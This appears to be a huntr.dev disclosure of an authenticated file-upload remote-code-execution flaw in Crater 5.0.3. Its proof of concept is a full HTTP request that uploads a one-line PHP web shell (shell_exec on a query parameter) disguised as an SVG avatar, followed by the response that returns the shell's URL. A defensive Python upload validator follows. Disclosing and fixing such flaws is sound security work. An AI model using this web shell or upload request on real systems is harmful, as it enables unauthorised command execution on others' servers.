huntr report D7453360-BACA-4E56-985F-481275FA38DB
Reported by theworstcomrade, Dec 03, 2021 - 10:01 p.m. (www.huntr.dev)
Repository: crater-invoice/crater
Tags: crater, upload avatar, php, code execution, vulnerability

EPSS: 0.001 (percentile 41.1%)
Description

In the current Crater version (commit ed6268aa, tag 5.0.3), the lowest-privileged user can upload a PHP file in place of an avatar image: the upload endpoint accepts the file on the strength of the client-supplied filename and Content-Type and stores it under the public storage path.

Proof of Concept

POST /api/v1/me/upload-avatar HTTP/1.1
Host: 172.17.0.1:8888
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
company: 1
X-XSRF-TOKEN: eyJpdiI6IlBrOE1JS01vcDBqL0hqcXZURTRQMmc9PSIsInZhbHVlIjoiMVVSUVk5N3FmYTh2UG5KSiszSmp3aEg5MXlxSWFMUHRNZFpyME5LRFM3OEpiRWR3dlVCeDJ4a2FYQU9hYmFrZjBmNVBUbGp5UitIY1c3L1JtcWtGaDdoalBXSXU3L2NFS2NMbHZVT3JhNm1zeXdLZllkR2RNVGdKL3NuSWhWblciLCJtYWMiOiI0OTRhMmZkZGFjODA1MWY3ZWQyZmRhY2RhNmRkOTVlNDc0Njg2YzlmY2E2NzkyZjU0ZWExNjBiZjVhZGViMGE2IiwidGFnIjoiIn0=
Content-Type: multipart/form-data; boundary=---------------------------324661512726686552372889486730
Content-Length: 270
Origin: http://172.17.0.1:8888
DNT: 1
Connection: close
Referer: http://172.17.0.1:8888/admin/settings/account-settings
Cookie: XSRF-TOKEN=eyJpdiI6IlBrOE1JS01vcDBqL0hqcXZURTRQMmc9PSIsInZhbHVlIjoiMVVSUVk5N3FmYTh2UG5KSiszSmp3aEg5MXlxSWFMUHRNZFpyME5LRFM3OEpiRWR3dlVCeDJ4a2FYQU9hYmFrZjBmNVBUbGp5UitIY1c3L1JtcWtGaDdoalBXSXU3L2NFS2NMbHZVT3JhNm1zeXdLZllkR2RNVGdKL3NuSWhWblciLCJtYWMiOiI0OTRhMmZkZGFjODA1MWY3ZWQyZmRhY2RhNmRkOTVlNDc0Njg2YzlmY2E2NzkyZjU0ZWExNjBiZjVhZGViMGE2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im13VlVJa1JyZWs4OWFLWlBBa0JobXc9PSIsInZhbHVlIjoiU21kVnR2Skc1UnZmSnR3SVhiL09qSFBmWGxGV0FMUi9pSzFSTkc2enBZL01GbkJBbCtiMzJmWnNLM3l2OWRJRVk0bUZ2dFRYTkVTWnRQV0xCNnkxbFdIOEJjS1E5N2dwRWNyNC90cHZRSTJaWHozcWNtcmo2RTltY2U0Q1ZEeXQiLCJtYWMiOiJmMzIxYTFiNjU2Y2QyOWM2ZDdiOWJiYzMyYjQ3NWFmZGM3NDU0ZTA0MjNhZjg0ZGEzZDgzZGFlMGEwMjQzMGJmIiwidGFnIjoiIn0%3D; D5zxaxhEVxptcHSFSkkLadY5LtUnr9yDLzGS8IGz=...%3D

-----------------------------324661512726686552372889486730
Content-Disposition: form-data; name="admin_avatar"; filename="shell.php"
Content-Type: image/svg+xml

<?php print_r(shell_exec($_GET[1])); ?>
-----------------------------324661512726686552372889486730--

In the response, the link to the uploaded file is returned in data->avatar:

{
    "data":
    {
        "id": 3,
        "name": "user2",
        "email": "[email protected]",
...
        "avatar": "http:\/\/172.17.0.1:8888\/storage\/4\/shell.php",
        "is_owner": false,
...
    }
}

Impact

This vulnerability is of high severity and leads to remote code execution: the uploaded PHP file is reachable at the URL returned in the response, so any authenticated user, including the lowest-privileged role, can run commands on the server.
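As an added example (not Crater's code; the function names and the sample uploads are constructed for illustration), the server-side checks, written in Python, that would reject the request above and that the avatar upload handler needs: an extension allowlist, a declared Content-Type that must match that extension, magic-byte sniffing of the actual bytes, a scan for PHP open tags in image polyglots, and a random storage name so the client never chooses the filename.

```python
import re
import secrets

# Allowlist of avatar formats: extension -> (expected MIME, magic-byte prefix).
# Policy assumed for this example: raster images only (no SVG, which can
# carry script, and nothing the web server might execute).
ALLOWED = {
    "png":  ("image/png",  b"\x89PNG\r\n\x1a\n"),
    "jpg":  ("image/jpeg", b"\xff\xd8\xff"),
    "jpeg": ("image/jpeg", b"\xff\xd8\xff"),
    "gif":  ("image/gif",  b"GIF8"),
}
PHP_OPEN_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)

def validate_avatar(filename: str, declared_type: str, data: bytes):
    """Return (accepted, reason). Decisions rest on the bytes and on an
    allowlist, never on what the client claims in filename or Content-Type."""
    name = re.split(r"[\\/]", filename)[-1]          # drop any path component
    if "." not in name:
        return False, "no extension"
    ext = name.rsplit(".", 1)[1].lower()             # last extension only
    if ext not in ALLOWED:
        return False, f"extension .{ext} not allowed"
    mime, magic = ALLOWED[ext]
    if declared_type.split(";")[0].strip().lower() != mime:
        return False, f"declared type {declared_type!r} does not match .{ext}"
    if not data.startswith(magic):
        return False, f"content is not a {ext.upper()} image"
    if PHP_OPEN_TAG.search(data):
        # Polyglot: genuine image header with PHP appended or in metadata.
        return False, "PHP open tag inside image data"
    return True, "ok"

def storage_name(filename: str) -> str:
    """Never reuse the client's name: random name plus the validated extension."""
    ext = filename.rsplit(".", 1)[1].lower()
    return f"{secrets.token_hex(16)}.{ext}"

# Constructed uploads: the report's shape (PHP file declared as SVG), a real
# PNG header, a PNG/PHP polyglot, and PHP code behind a .png name.
SAMPLES = {
    "report_poc": ("shell.php", "image/svg+xml", b"<?php echo 1; ?>"),
    "good_png":   ("me.png", "image/png", b"\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR"),
    "polyglot":   ("me.png", "image/png", b"\x89PNG\r\n\x1a\n<?php echo 1; ?>"),
    "renamed":    ("me.png", "image/png", b"<?php echo 1; ?>"),
}

def check_all():
    return {k: validate_avatar(*v) for k, v in SAMPLES.items()}
```

Run `check_all()` to see each sample's verdict; only `good_png` is accepted, and even an accepted file should be written under `storage_name()` rather than the submitted name.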
